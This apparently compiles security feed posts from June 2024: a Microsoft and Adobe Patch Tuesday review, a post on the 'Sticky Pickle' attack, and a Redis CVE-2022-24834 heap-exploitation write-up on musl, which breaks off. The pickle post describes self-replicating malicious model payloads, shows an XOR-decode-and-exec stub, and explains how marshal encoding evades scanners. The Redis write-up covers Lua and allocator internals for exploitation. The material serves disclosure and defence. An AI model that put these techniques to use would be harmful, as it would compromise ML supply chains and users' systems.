CVE-2024-30088 and CVE-2024-30099 are two high-severity elevation of privilege vulnerabilities in NT kernel drivers that are also considered “more likely” to be exploited. Successful exploitation of these vulnerabilities would give an adversary local user and SYSTEM privileges, respectively.  

Mskssrv, a Microsoft Streaming Service kernel driver, also contains two elevation of privilege vulnerabilities: CVE-2024-30089 and CVE-2024-30090. An adversary successfully exploiting these vulnerabilities could gain SYSTEM privileges.   

CVE-2024-30084 and CVE-2024-35250 are two further high-severity elevation of privilege vulnerabilities, both in the Windows kernel-mode driver, that are considered “more likely” to be exploited. An adversary could gain SYSTEM privileges by successfully exploiting these vulnerabilities. However, they must first win a race condition. 

A complete list of all the vulnerabilities Microsoft disclosed this month is available on its update page.  

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date, and current rules are subject to change pending additional information. Cisco Secure Firewall customers should use the latest update to their rule set by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 63581 - 63591, 63596 and 63597. There are also Snort 3 pre-processor rules 300937 - 300940.

The June 2024 Security Update Review

11 June 2024 at 17:31

Somehow, we’ve made it to the sixth Patch Tuesday of 2024, and Microsoft and Adobe have released their regularly scheduled updates. Take a break from your regular activities and join us as we review the details of their latest security alerts. If you’d rather watch the full video recap covering the entire release, you can check it out here:

Adobe Patches for June 2024

For June, Adobe released 10 patches addressing 165(!) CVEs in Adobe ColdFusion, Photoshop, Experience Manager, Audition, Media Encoder, FrameMaker Publishing Server, Adobe Commerce, Substance 3D Stager, Creative Cloud Desktop, and Acrobat Android. The fix for Experience Manager is by far the largest with a whopping 143 CVEs addressed. However, all but one of these bugs are simply cross-site scripting (XSS) vulnerabilities. The patch for ColdFusion fixes two bugs, but neither is a code execution bug. The same is true of the patch addressing bugs in Audition. The fix for Media Encoder addresses a single OOB Read memory leak. The update for Photoshop also has just one bug: a Critical-rated code execution issue. That’s also the story for the Substance 3D Stager patch.

The patch for FrameMaker Publishing Server has only two bugs, but one is a CVSS 10 and the other is a 9.8. If you’re using this product, this should be the first patch you test and deploy. The patch for Commerce should also be high on your test-and-deploy list as it corrects 10 bugs, including some Critical-rated code execution vulns. The patch for Creative Cloud Desktop fixes a single code execution bug. Finally, the patch for Acrobat Android corrects two security feature bypasses.

None of the bugs fixed by Adobe this month are listed as publicly known or under active attack at the time of release. Adobe categorizes these updates as a deployment priority rating of 3.

Microsoft Patches for June 2024

This month, Microsoft released 49 CVEs in Windows and Windows Components; Office and Office Components; Azure; Dynamics Business Central; and Visual Studio. If you include the third-party CVEs being documented this month, the CVE count comes to 58. A total of eight of these bugs came through the ZDI program, and that does include some of the cases reported during the Pwn2Own Vancouver contest in March.

Of the new patches released today, only one is rated Critical, and 48 are rated Important in severity. This release is another small release when compared to the monster that was April.

Only one of the CVEs listed today is listed as publicly known, but that’s actually just a third-party update that’s now being integrated into Microsoft products. Nothing is listed as being under active attack. Let’s take a closer look at some of the more interesting updates for this month, starting with the lone Critical-rated patch for this month:

-       CVE-2024-30080 – Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability
This update receives a CVSS rating of 9.8 and would allow remote, unauthenticated attackers to execute arbitrary code with elevated privileges on systems where MSMQ is enabled. That makes this wormable between those servers, but not to systems where MSMQ is disabled. This is similar to the “QueueJumper” vulnerability from last year, but it’s not clear how many affected systems are exposed to the internet. While it is likely a low number, now would be a good time to audit your networks to ensure TCP port 1801 is not reachable.  

-       CVE-2024-30103 – Microsoft Outlook Remote Code Execution Vulnerability
This patch corrects a bug that allows attackers to bypass Outlook registry block lists and enable the creation of malicious DLL files. While not explicitly stated, attackers would likely then use the malicious DLL files to perform some form of DLL hijacking for further compromise. The good news here is that the attacker would need valid Exchange credentials to perform this attack. The bad news is that the exploit can occur in the Preview Pane. Considering how often credentials end up being sold in underground forums, I would not ignore this fix.  

-       CVE-2024-30078 – Windows Wi-Fi Driver Remote Code Execution Vulnerability
This vulnerability allows an unauthenticated attacker to execute code on an affected system by sending the target a specially crafted network packet. Obviously, the target would need to be in Wi-Fi range of the attacker and using a Wi-Fi adapter, but that’s the only restriction. Microsoft rates this as “exploitation less likely” but considering it hits every supported version of Windows, it will likely draw a lot of attention from attackers and red teams alike.
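
The port audit suggested for CVE-2024-30080 can be partly scripted. The following is a minimal sketch, not a replacement for a proper scanner: it only reports whether a TCP connection to port 1801 succeeds from wherever the script runs. The helper name `tcp_port_open` is hypothetical, and the default port is the one named in the MSMQ discussion above.

```python
import socket

MSMQ_PORT = 1801  # TCP port named in the MSMQ discussion above


def tcp_port_open(host: str, port: int = MSMQ_PORT, timeout: float = 1.0) -> bool:
    """Return True if a TCP connection to (host, port) succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Refused, timed out, unreachable, or name resolution failed.
        return False
```

Calling `tcp_port_open("server.example")` for each host in your inventory gives a quick first pass. A `False` result only means the port was not reachable from the scanning host, so it is worth running from outside the network perimeter as well.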

Here’s the full list of CVEs released by Microsoft for June 2024:

CVE Title Severity CVSS Public Exploited Type
CVE-2024-30080 Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability Critical 9.8 No No RCE
CVE-2024-35255 Azure Identity Libraries and Microsoft Authentication Library Elevation of Privilege Vulnerability Important 5.5 No No EoP
CVE-2024-35254 † Azure Monitor Agent Elevation of Privilege Vulnerability Important 7.1 No No EoP
CVE-2024-37325 † Azure Science Virtual Machine (DSVM) Elevation of Privilege Vulnerability Important 9.8 No No EoP
CVE-2024-35252 Azure Storage Movement Client Library Denial of Service Vulnerability Important 7.5 No No DoS
CVE-2024-30070 DHCP Server Service Denial of Service Vulnerability Important 7.5 No No DoS
CVE-2024-29187 * GitHub: CVE-2024-29187 WiX Burn-based bundles are vulnerable to binary hijack when run as SYSTEM Important 7.3 No No EoP
CVE-2024-35253 Microsoft Azure File Sync Elevation of Privilege Vulnerability Important 4.4 No No EoP
CVE-2024-35263 Microsoft Dynamics 365 (On-Premises) Information Disclosure Vulnerability Important 5.7 No No Info
CVE-2024-35248 Microsoft Dynamics 365 Business Central Elevation of Privilege Vulnerability Important 7.3 No No EoP
CVE-2024-35249 Microsoft Dynamics 365 Business Central Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-30072 Microsoft Event Trace Log File Parsing Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2024-30104 Microsoft Office Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2024-30101 Microsoft Office Remote Code Execution Vulnerability Important 7.5 No No RCE
CVE-2024-30102 Microsoft Office Remote Code Execution Vulnerability Important 7.3 No No RCE
CVE-2024-30103 Microsoft Outlook Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-30100 Microsoft SharePoint Server Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2024-30097 Microsoft Speech Application Programming Interface (SAPI) Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-30089 Microsoft Streaming Service Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-30090 Microsoft Streaming Service Elevation of Privilege Vulnerability Important 7 No No EoP
CVE-2023-50868 * MITRE: CVE-2023-50868 NSEC3 closest encloser proof can exhaust CPU Important 7.5 Yes No DoS
CVE-2024-29060 Visual Studio Elevation of Privilege Vulnerability Important 6.7 No No EoP
CVE-2024-30052 Visual Studio Remote Code Execution Vulnerability Important 4.7 No No RCE
CVE-2024-30082 Win32k Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-30087 Win32k Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-30091 Win32k Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-30085 Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-30076 Windows Container Manager Service Elevation of Privilege Vulnerability Important 6.8 No No EoP
CVE-2024-30096 Windows Cryptographic Services Information Disclosure Vulnerability Important 5.5 No No Info
CVE-2024-30063 Windows Distributed File System (DFS) Remote Code Execution Vulnerability Important 6.7 No No RCE
CVE-2024-30064 Windows Kernel Elevation of Privilege Vulnerability Important 8.8 No No EoP
CVE-2024-30068 Windows Kernel Elevation of Privilege Vulnerability Important 8.8 No No EoP
CVE-2024-30088 Windows Kernel Elevation of Privilege Vulnerability Important 7 No No EoP
CVE-2024-30099 Windows Kernel Elevation of Privilege Vulnerability Important 7 No No EoP
CVE-2024-35250 Windows Kernel-Mode Driver Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-30084 Windows Kernel-Mode Driver Elevation of Privilege Vulnerability Important 7 No No EoP
CVE-2024-30074 Windows Link Layer Topology Discovery Protocol Remote Code Execution Vulnerability Important 8 No No RCE
CVE-2024-30075 Windows Link Layer Topology Discovery Protocol Remote Code Execution Vulnerability Important 8 No No RCE
CVE-2024-30077 Windows OLE Remote Code Execution Vulnerability Important 8 No No RCE
CVE-2024-35265 Windows Perception Service Elevation of Privilege Vulnerability Important 7 No No EoP
CVE-2024-30069 Windows Remote Access Connection Manager Information Disclosure Vulnerability Important 4.7 No No Info
CVE-2024-30094 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2024-30095 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2024-30083 Windows Standards-Based Storage Management Service Denial of Service Vulnerability Important 7.5 No No DoS
CVE-2024-30062 Windows Standards-Based Storage Management Service Remote Code Execution Vulnerability Important 7.8 No No RCE
CVE-2024-30093 Windows Storage Elevation of Privilege Vulnerability Important 7.3 No No EoP
CVE-2024-30065 Windows Themes Denial of Service Vulnerability Important 5.5 No No DoS
CVE-2024-30078 Windows Wi-Fi Driver Remote Code Execution Vulnerability Important 8.8 No No RCE
CVE-2024-30086 Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability Important 7.8 No No EoP
CVE-2024-30066 Winlogon Elevation of Privilege Vulnerability Important 5.5 No No EoP
CVE-2024-30067 WinLogon Elevation of Privilege Vulnerability Important 5.5 No No EoP
CVE-2024-5493 * Chromium: CVE-2024-5493 Heap buffer overflow in WebRTC High N/A No No RCE
CVE-2024-5494 * Chromium: CVE-2024-5494 Use after free in Dawn High N/A No No RCE
CVE-2024-5495 * Chromium: CVE-2024-5495 Use after free in Dawn High N/A No No RCE
CVE-2024-5496 * Chromium: CVE-2024-5496 Use after free in Media Session High N/A No No RCE
CVE-2024-5497 * Chromium: CVE-2024-5497 Out of bounds memory access in Keyboard Inputs High N/A No No RCE
CVE-2024-5498 * Chromium: CVE-2024-5498 Use after free in Presentation API High N/A No No RCE
CVE-2024-5499 * Chromium: CVE-2024-5499 Out of bounds write in Streams API High N/A No No RCE

* Indicates this CVE had been released by a third party and is now being included in Microsoft releases.

† Indicates further administrative actions are required to fully address the vulnerability.

 

Looking at the other fixes addressing code execution bugs, there are a couple that stand out. In addition to the Wi-Fi bug above, there are two similar bugs in the Link Layer Topology Discovery Protocol with similar exploit vectors. The difference is that for these two bugs, the target needs to be running the Network Map functionality for the attack to succeed. There are several “open-and-own” type vulnerabilities getting patched. The one to look out for would be the Office bug that states, “The Preview Pane is an attack vector, but additional user interaction is required.” It’s not clear how that would manifest. The exploit for DFS requires an adjacent attacker to already be executing code on a target, which reads more like an EoP to me. The OLE bug requires connecting to a malicious SQL server. The bug in the Speech Application Programming Interface (SAPI) requires a user to click a link to connect to the attacker’s server. Lastly, the code execution bug in Dynamics 365 requires authentication, which again sounds more like an EoP, but it also states no user interaction is required. It’s an odd write-up that implies it’s unlikely to be exploited in the wild.

Roughly half of this month’s release corrects privilege escalation bugs, and the majority of these lead to SYSTEM-level code execution if an authenticated user runs specially crafted code. Other privilege escalation bugs would allow the attacker to get to the level of the running application. The bugs in Winlogon are somewhat intriguing as they could allow an attacker to replace valid file content with specially crafted file content. One of the kernel bugs could be used for a container escape. The bug in the Perception Service could allow elevation to the “NT AUTHORITY\LOCAL SERVICE” account. The vulnerability in Visual Studio requires an attacker to create a malicious extension. An authenticated user would then need to create a Visual Studio project that uses that extension. If they manage all of that, it would lead to admin privileges.

The bug in Azure Identity Libraries and Microsoft Authentication Library allows attackers to read any file on the target with SYSTEM privileges. The privilege escalation in Azure Monitor Agent could let attackers delete files and folders. If you’ve disabled Automatic Extension Upgrades, you’ll need to perform a manual update to ensure the Monitor Agent is at the latest version. Speaking of extra actions, the bug in the Azure Science Virtual Machine (DSVM) requires you to upgrade your DSVM to Ubuntu 20.04. If you’re not familiar with this procedure, Microsoft provides this article for guidance. Attackers who exploit this bug could gain access to user credentials, which would allow them to impersonate authorized users.

There are only three information disclosure bugs receiving fixes this month and only one results in info leaks consisting of unspecified memory contents. The bug in the on-premises version of Dynamics 365 could allow an attacker to exfiltrate all the data accessible to the logged-on user. The vulnerability in the Cryptographic Services could disclose sensitive information such as KeyGuard (KG) keys, which are intended to be per-boot and used to protect sensitive data. An attacker could potentially use these to decrypt anything encrypted with those keys.

The final bugs for June address Denial-of-Service (DoS) vulnerabilities in Windows and Azure components. Unfortunately, Microsoft provides no additional information about these bugs and how they would manifest on affected systems. They do note the DoS in the DHCP Server does not affect those who have configured failover for their DHCP setup.

There are no new advisories in this month’s release.

Looking Ahead

The next Patch Tuesday of 2024 will be on July 9, and I’ll return with details and patch analysis then. Until then, stay safe, happy patching, and may all your reboots be smooth and clean!

Exploiting ML models with pickle file attacks: Part 2

11 June 2024 at 15:00

By Boyan Milanov

In part 1, we introduced Sleepy Pickle, an attack that uses malicious pickle files to stealthily compromise ML models and carry out sophisticated attacks against end users. Here we show how this technique can be adapted to enable long-lasting presence on compromised systems while remaining undetected. This variant technique, which we call Sticky Pickle, incorporates a self-replicating mechanism that propagates its malicious payload into successive versions of the compromised model. Additionally, Sticky Pickle uses obfuscation to disguise the malicious code to prevent detection by pickle file scanners.

Making malicious pickle payloads persistent

Recall from our previous blog post that Sleepy Pickle exploits rely on injecting a malicious payload into a pickle file containing a packaged ML model. This payload is executed when the pickle file is deserialized to a Python object, compromising the model’s weights and/or associated code. If the user decides to modify the compromised model (e.g., fine-tuning) and then re-distribute it, it will be serialized in a new pickle file that the attacker does not control. This process will likely render the exploit ineffective.

To overcome this limitation, we developed Sticky Pickle, a self-replication mechanism that wraps our model-compromising payload in an encapsulating, persistent payload. The encapsulating payload performs the following actions when it is executed:

    1. Find the original compromised pickle file being loaded on the local filesystem.
    2. Open the file and read the encapsulating payload’s bytes from disk. (The payload cannot access them directly via its own Python code.)
    3. Hide its own bytecode in the object being unpickled under a predefined attribute name.
    4. Hook the pickle.dump() function so that when an object is re-serialized, it:
      • Serializes the object using the regular pickle.dump() function.
      • Detects that the object contains the bytecode attribute.
      • Manually injects the bytecode in the new Pickle file that was just created.

Figure 1: Persistent payload in malicious ML model files

With this technique, malicious pickle payloads automatically spread to derivative models without leaving a trace on the disk outside of the infected pickle file. Moreover, the ability to hook any function in the Python interpreter allows for other attack variations as the attacker can access other local files, such as training datasets or configuration files.

Payload obfuscation: Going under the radar

Another limitation of pickle-based exploits arises from the malicious payload being injected directly as Python source code. This means that the malicious code appears in plaintext in the Pickle file. This has several drawbacks. First, it is possible to detect the attack with naive file scanning and a few heuristics that target the presence of significant chunks of raw Python within Pickle files. Second, it’s easy for security teams to identify the attack and its intent just by looking at it.

We developed a payload obfuscation and encoding method that overcomes these limitations and makes payload detection much harder. Starting with our original payload consisting of code that compromises the pickled ML model, we modify it in two ways.

First, we obfuscate the payload by compiling it into a Python code object and serializing it into a string with the marshal library. This lets us inject this serialized payload string into the pickle file, followed by a special bytecode sequence. When executed, this special sequence calls marshal.loads() on the string to reconstruct the code object of the payload and execute it. This makes the payload completely unreadable to scanners or human inspection as it is injected as compiled Python bytecode instead of source code.
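
The compile-and-marshal round trip described above can be illustrated with a harmless snippet. This is a minimal sketch using only the standard library; the source string is a benign stand-in chosen for illustration and is not the payload from this research.

```python
import marshal

# Benign stand-in for a payload: it only computes a number.
source = "result = sum(range(5))"

# Compile the source text into a code object, then serialize it to bytes.
code_obj = compile(source, "<demo>", "exec")
blob = marshal.dumps(code_obj)

# Later, the bytes are turned back into a code object and executed.
restored = marshal.loads(blob)
namespace = {}
exec(restored, namespace)

print(namespace["result"])      # 10
print(source.encode() in blob)  # False: the source line itself is not stored
```

Note that the marshal format is specific to the Python version that produced it, so a blob created by one interpreter version is not guaranteed to load in another.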

Second, we use a simple XOR encoding to vary the payload in every infected file. Instead of consisting of only the original model-compromising code, the XORed payload contains the XOR-encoded Python source of the original payload and a decoding and execution stub similar to this:

def compromise_model(model):
    # The string of the XOR-encoded python payload source code
    encoded_payload = 
    # This line decodes the payload and executes it
    exec(bytearray(b ^ 0x{XOR_KEY:X} for b in encoded_payload))
    return model

Since the obfuscation key can take any value and is hardcoded in the decoding stub, this method complements the persistence feature by allowing attackers to write a payload that generates a new obfuscation key upon reinjection in a new pickle file. This results in different Python payloads, code objects, and final pickle payloads being injected into compromised files, while the malicious behavior remains unchanged.
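
The effect of changing the key can be seen with a small, benign round trip. This is only a sketch of single-byte XOR encoding; the helper `xor_bytes`, the sample bytes, and the two key values are hypothetical and chosen for illustration.

```python
def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key; applying it twice restores data."""
    return bytes(b ^ key for b in data)


plain = b"print('hello')"  # benign stand-in for payload source code
encoded_a = xor_bytes(plain, 0x21)
encoded_b = xor_bytes(plain, 0x5A)

print(encoded_a != encoded_b)                # True: different key, different bytes
print(xor_bytes(encoded_a, 0x21) == plain)   # True
print(xor_bytes(encoded_b, 0x5A) == plain)   # True
```

The same input yields different encoded bytes for each key while decoding to identical content, which is why byte-signature matching on the encoded form is unreliable.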

Figure 2: Obfuscation of the Python payload before injection in a pickle file

Figure 2 shows how this obfuscation method completely hides the malicious payload within the file. Automated tools or security analysts scanning the file would see only:

  1. The raw bytes of the Python payload that was compiled and then marshaled. It is difficult, if not impossible, to interpret these bytes and flag them as dangerous with static scanning.
  2. The pickle sequence that calls marshal.loads(). This is a common pattern also found in benign pickle files and thus is not sufficient to alert users about potential malicious behavior.
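
To make concrete what an opcode-level scanner observes, here is a minimal sketch that lists the module and attribute names a pickle asks the unpickler to import, without loading it. It relies on the standard library's `pickletools.genops`; the function name `list_imports` is hypothetical, and the `STACK_GLOBAL` handling is a simple heuristic (it assumes the two most recent string pushes are the module and name) rather than a full stack simulation like the one a dedicated tool would perform.

```python
import pickle
import pickletools
from collections import OrderedDict

STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"}


def list_imports(data: bytes) -> list:
    """Return (module, name) pairs referenced by GLOBAL/STACK_GLOBAL opcodes."""
    found = []
    recent_strings = []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in STRING_OPS:
            recent_strings.append(arg)
        elif opcode.name == "GLOBAL":
            # pickletools reports the argument as "module name".
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif opcode.name == "STACK_GLOBAL" and len(recent_strings) >= 2:
            # Heuristic: module and name were the last two strings pushed.
            found.append((recent_strings[-2], recent_strings[-1]))
    return found


print(list_imports(pickle.dumps(OrderedDict(a=1), protocol=2)))
print(list_imports(pickle.dumps([1, 2, 3])))
```

A reference to `marshal.loads` would show up in this list, but as noted above, its presence alone does not distinguish a malicious file from a benign one.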

When a pickle file containing the obfuscated payload is loaded, the payload stages are executed in the following order, illustrated in figure 3:

  1. The malicious pickle opcodes load the raw bytes of the serialized code object, then reconstruct the Python code object using marshal.loads(), and finally execute the code object.
  2. The code object is executed and decodes the XOR-encoded Python source code of the original payload.
  3. The decoded original payload code is executed and compromises the loaded ML model.

Figure 3: Overview of execution stages of the obfuscated payload

Sealing the lid on pickle

These persistence and evasion techniques show the level of sophistication that pickle exploits can achieve. Expanding on the critical risks we demonstrated in part one of this series, we’ve seen how a single malicious pickle file can:

  • Compromise other local pickle files and ML models.
  • Evade file scanning and make manual analysis significantly harder.
  • Make its payload polymorphic and spread it under an ever-changing form while maintaining the same final stage and end goal.

While these are only examples among other possible attack improvements, persistence and evasion are critical aspects of pickle exploits that, to our knowledge, have not yet been demonstrated.

Despite the risks posed by pickle files, we acknowledge that it will be a long-term effort for major frameworks of the ML ecosystem to move away from them. In the short term, here are some steps you can take to eliminate your exposure to these issues:

  • Avoid using pickle files to distribute serialized models.
  • Adopt safer alternatives to pickle files such as HuggingFace’s SafeTensors.
  • If you must use pickle files, scan them with our very own Fickling to detect pickle-based ML attacks.
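
If pickle files cannot be avoided, one additional hardening measure is the allowlisting approach described in the Python documentation: override `Unpickler.find_class` so that only expected globals can be resolved. The following is a minimal sketch of that pattern, not a complete defense and not how Fickling works; the `ALLOWED` set, `AllowlistUnpickler`, and `safe_loads` are hypothetical names for illustration.

```python
import io
import pickle
from collections import OrderedDict

# Hypothetical allowlist: only these (module, name) pairs may be imported.
ALLOWED = {("collections", "OrderedDict")}


class AllowlistUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) in ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked import: {module}.{name}")


def safe_loads(data: bytes):
    """Unpickle data, refusing any global that is not on the allowlist."""
    return AllowlistUnpickler(io.BytesIO(data)).load()


print(safe_loads(pickle.dumps(OrderedDict(a=1))))
try:
    safe_loads(pickle.dumps(len))  # references builtins.len, not allowlisted
except pickle.UnpicklingError as exc:
    print(exc)
```

Real ML model pickles reference many framework classes, so a practical allowlist is considerably longer and has to be maintained alongside the framework version in use.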

Long-term, we are continuing our efforts to drive the ML industry to adopt secure-by-design technologies. If you want to learn more about our contributions, check out our awesome-ml-security and ml-file-formats GitHub repositories and our recent responsible disclosure of a critical GPU vulnerability called LeftoverLocals!

Acknowledgments

Thanks to our intern Russel Tran for their hard work on pickle payload obfuscation and optimization.

Pumping Iron on the Musl Heap – Real World CVE-2022-24834 Exploitation on an Alpine mallocng Heap

11 June 2024 at 14:36

This post is about exploiting CVE-2022-24834 against a Redis
container running on Alpine Linux. CVE-2022-24834 is a vulnerability
affecting the Lua cjson module in Redis servers <=7.0.11. The bug is an
integer overflow that leads to a large copy of data, approximately
350MiB.

A colleague from NCC Group wanted to exploit this bug but found that
the public exploits didn’t work. This was ultimately due to those
exploits being written to target Ubuntu or similar distros, which use
the GNU libc library.
The target in our case was Alpine 3.18, which uses musl libc 1.2.4. The important
distinction here is that GNU libc uses the ptmalloc2 heap allocator, and
musl 1.2.4 uses its own custom allocator called mallocng. This resulted
in some interesting differences during exploitation, which I figured I
would document since there’s not a lot of public information about
targeting the musl heap.

I highly recommend reading Ricerca Security’s original writeup,
which goes into depth about the vulnerability and how they approached
exploitation on ptmalloc2. Conviso Labs has a README.md that
describes some improvements that they made, which is also worth a look.
There are quite a few differences between exploitation on ptmalloc2 and
mallocng, which I’ll explain as I go. I’ll try not to repeat the details
that previous research has already provided but rather focus on the
parts that differed for mallocng.

Finally, I want to note that I am not attacking the musl mallocng
allocator by corrupting its metadata, but rather I’m doing Lua-specific
exploitation on the mallocng heap, mimicking the strategy done by the
original exploit.

Lua 5.1

As the previous articles covered Lua internals in detail, I won’t
repeat that information here. Redis uses Lua 5.1, so it’s important to
refer to the specific version when reading, as Lua has undergone
significant changes across different releases. These changes include
structure layouts and the garbage collection algorithm utilized.

I would like to highlight that Lua utilizes Tagged Values to
represent various internal types such as numbers and tables. The
structure is defined as follows:

/*
** Tagged Values
*/

#define TValuefields                                                           \
    Value value;                                                               \
    int   tt

typedef struct lua_TValue {
    TValuefields;
} TValue;

In this structure, tt denotes the type, and
value can either be an inline value or a pointer depending
on the associated type. In Lua, a Table serves as the
primary storage type, akin to a dictionary or list in Python. It
contains an array of TValue structures. For simple types
like integers, value is used directly. However, for more
complex types like nested tables, value acts as a pointer.
For further implementation details, please refer to Lua’s
lobject.h file or the aforementioned articles.
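
As a rough illustration of the layout, the structure can be mirrored with Python's ctypes. This is a sketch assuming a default 64-bit build of Lua 5.1 (where lua_Number is a double); the union members follow Lua 5.1's lobject.h, the two type tags are the values from lua.h, and the `describe` helper is hypothetical.

```python
import ctypes

# Type tags from Lua 5.1's lua.h (only the two used here).
LUA_TNUMBER = 3
LUA_TTABLE = 5


class Value(ctypes.Union):
    """Mirror of Lua 5.1's Value union."""
    _fields_ = [
        ("gc", ctypes.c_void_p),  # GCObject *: tables, strings, ...
        ("p", ctypes.c_void_p),   # light userdata
        ("n", ctypes.c_double),   # lua_Number (double by default)
        ("b", ctypes.c_int),      # boolean
    ]


class TValue(ctypes.Structure):
    _fields_ = [("value", Value), ("tt", ctypes.c_int)]


def describe(tv: TValue) -> str:
    """Interpret value according to the type tag tt."""
    if tv.tt == LUA_TNUMBER:
        return f"number {tv.value.n}"
    if tv.tt == LUA_TTABLE:
        return f"table at {(tv.value.gc or 0):#x}"
    return f"type tag {tv.tt}"


print(ctypes.sizeof(TValue))  # 16 on a typical 64-bit platform
print(describe(TValue(Value(n=1.5), LUA_TNUMBER)))
print(describe(TValue(Value(gc=0x7ffff7a051a0), LUA_TTABLE)))
```

The 16-byte size explains why consecutive array entries in a table's TValue array sit 0x10 bytes apart.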

During debugging, I discovered the need to inspect Lua 5.1 objects.
The Alpine redis-server target did not include symbols for
the static Lua library. To address this, I compiled my own version of
Lua and filtered out all function symbols to only access the structure
definitions easily. This was achieved by identifying and stripping out
all FUNC symbols using readelf -Ws and
objcopy --strip-symbol.
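
The symbol-stripping step could be scripted along these lines. This is a sketch of one possible approach rather than the exact commands used for this post: it parses the `readelf -Ws` symbol table, collects every entry of type FUNC, and passes each name to `objcopy --strip-symbol`. The function names and the file paths in the usage note are hypothetical.

```python
import subprocess


def func_symbols(readelf_output: str) -> list:
    """Extract the names of FUNC symbols from `readelf -Ws` output."""
    names = []
    for line in readelf_output.splitlines():
        fields = line.split()
        # Symbol rows look like: Num: Value Size Type Bind Vis Ndx Name
        if len(fields) >= 8 and fields[0].endswith(":") and fields[3] == "FUNC":
            names.append(fields[7])
    return names


def strip_functions(src: str, dst: str) -> None:
    """Write a copy of src to dst with every FUNC symbol removed."""
    out = subprocess.run(["readelf", "-Ws", src], check=True,
                         capture_output=True, text=True).stdout
    cmd = ["objcopy"]
    for name in func_symbols(out):
        cmd.append(f"--strip-symbol={name}")
    subprocess.run(cmd + [src, dst], check=True)
```

For example, `strip_functions("liblua-debug.so", "lua-types-only.so")` would leave a file whose remaining debug information can be loaded into gdb for its type definitions.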

Additionally, I came across the GdbLuaExtension,
which offers pretty printers and other functionality for analyzing Lua
objects, albeit supporting version 5.3 only. I made some minor
modifications to enable its compatibility with Lua 5.1. These
changes enabled features like pretty printers for tables, although I
didn’t exhaustively test the rest of its functionality.

This method provides a clearer analysis of objects like a
Table, presenting information in a more readable format
compared to a hexdump.

(gdb) p/x *(Table *) 0x7ffff7a05100
$2 = <lua_table> = {
  [1] = (TValue *) 0x7fffaf9ef620 <lua_table^> 0x7ffff4a76322,
  [2] = (TValue *) 0x7fffaf9ef630 <lua_table^> 0x7ffff7a051a0,
  [3] = (TValue *) 0x7fffaf9ef640 <lua_table^> 0x7ffff7a051f0,
  [4] = (TValue *) 0x7fffaf9ef650 <lua_table^> 0x7ffff7a05290,
  [5] = (TValue *) 0x7fffaf9ef660 <lua_table^> 0x7ffff7a052e0,

The Table we printed shows an array of
TValue structures, and we can see that each
TValue in our table is referencing another table.

Musl’s Next Generation Allocator – aka mallocng

On August 4, 2020, musl 1.2.1 shipped a new heap algorithm called
“mallocng”. This allocator has received some good quality research in
the past, predominantly focused on CTF challenge exploitation. I didn’t
find any real-world exploitation examples, but if someone knows of some,
please let me know and I’ll update the article.

The mallocng allocator is slab-based and organizes fixed-sized
allocations (called slots) on multi-page slabs (called
groups). In general, groups are mmap()-backed.
However, a group containing small slots may actually be smaller than a
page, in which case the group is itself just a larger fixed-sized
slot in a larger group. The allocator not using brk() is an
important detail as we will see later. The fixed size for a given group
is referred to as the group’s stride.

The mallocng allocator seems to be designed with security in mind,
mixing a combination of in-band metadata that contains some cookies,
with predominantly out-of-band metadata which is stored in slots on
dedicated group mappings that are prefixed with guard pages to prevent
corruption from linear overflows.

As I’m not actually going to be exploiting the allocator internals
itself, I won’t go into too much detail about the data structures. I
advise you to read pre-existing articles, which you can find in the
resource section.

There’s a useful gdb plugin called muslheap developed by
xf1les, which I made a lot of use of. xf1les also has an associated blog
post which is worth reading. At the time of writing, I have a PR open to
add this functionality to pwndbg, and hopefully will have time to add
some more functionality to it afterwards.

There is one particularly interesting aspect of the allocator that I
want to go over, which is that it can adjust the starting offset of
slots inside a group across subsequent allocations, using a value it
calls the cycling offset. It only does so if the overhead of a given
slot inside the fixed size has a large enough remainder such that the
offset can be adjusted. Interestingly, in this case, because the slots
we are working with are in the 0x50-stride group, and the Table
structure is 0x48 bytes, this cycling offset doesn’t apply. Since I
narrowly avoided having to deal with this, and originally thought I
would have to, I’ll still take a moment to explain what the mitigation
is actually for and what it looks like in practice.

mallocng Cycling Offset

The cycling offset is a technique used to mitigate double frees,
although it can have a negative effect on other exploitation scenarios
as well. It works by adjusting the offset of the user data part of an
allocation each time a chunk is used, wrapping back to the beginning
once the offset is larger than the slack space. The offset starts at 1
and increments each time the chunk is reused.

The idea behind mitigating a double free is that if a chunk is used
and then freed, and then re-used, the offset used for the second
allocation will not be the same as the first time, due to cycling. Then,
when it is double freed, that free will detect some in-band metadata
anomaly and fail.

The allocator goes about this offset cycling by abusing the fact that
groups have fixed-sized slots, and often the user data being allocated
will not fill up the entire space of the slot, resulting in some slack
space. If the remaining slack space in the slot is large enough, which
is calculated by subtracting both the size of the user data and the
required in-line metadata, then there are actually two in-line metadata
